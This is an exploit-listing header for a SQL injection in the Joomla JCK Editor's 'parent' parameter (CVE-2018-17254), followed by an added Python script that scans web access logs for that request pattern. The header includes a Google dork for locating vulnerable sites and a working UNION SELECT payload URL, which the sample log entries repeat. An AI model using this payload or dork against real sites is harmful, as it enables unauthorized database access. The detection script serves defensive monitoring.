# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection
# Google Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10, Ubuntu, Windows 11/10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
# Reference : https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254

Greettzz LXPLOIT - CUKIMAY CYBER TEAM
My Friends : Noniod7 - Ardzz
Recoded from : Hamza Megahed
https://www.bloglumajangteamsec.my.id/2023/01/cve-2018-17254-eksploitasi.html
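
A log check for the request pattern shown in the POC line, added here as an example and not part of the original exploit entry. It assumes combined-format web server access logs and that a legitimate `parent` value never contains SQL syntax; the function names and the sample log entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint named in the PoC for CVE-2018-17254.
VULN_PATH = "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Assumption: a legitimate 'parent' value never carries SQL syntax.
SQL_RE = re.compile(r"""["'`;]|--|/\*|@@|\b(?:union|select|sleep|benchmark)\b""", re.I)

def suspicious_parent(line):
    """Return the decoded 'parent' value when the entry targets links.php
    with SQL syntax in that parameter, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith(VULN_PATH):
        return None
    # parse_qs percent-decodes the value, so %22 and %20 are seen as " and space.
    for value in parse_qs(url.query, keep_blank_values=True).get("parent", []):
        if SQL_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_parent) for every flagged entry."""
    hits = []
    for line in lines:
        value = suspicious_parent(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample entries (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2023:10:00:00 +0000] "GET ' + VULN_PATH
    + '?extension=menu&view=menu&parent=mainmenu HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jan/2023:10:00:02 +0000] "GET ' + VULN_PATH
    + '?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,'
    '@@version,NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 200 731',
    '198.51.100.7 - - [10/Jan/2023:10:00:05 +0000] "GET /index.php?parent=%22x HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(ip, repr(value))
```

A hit shows that the endpoint was probed; it does not by itself show that the injected query returned data.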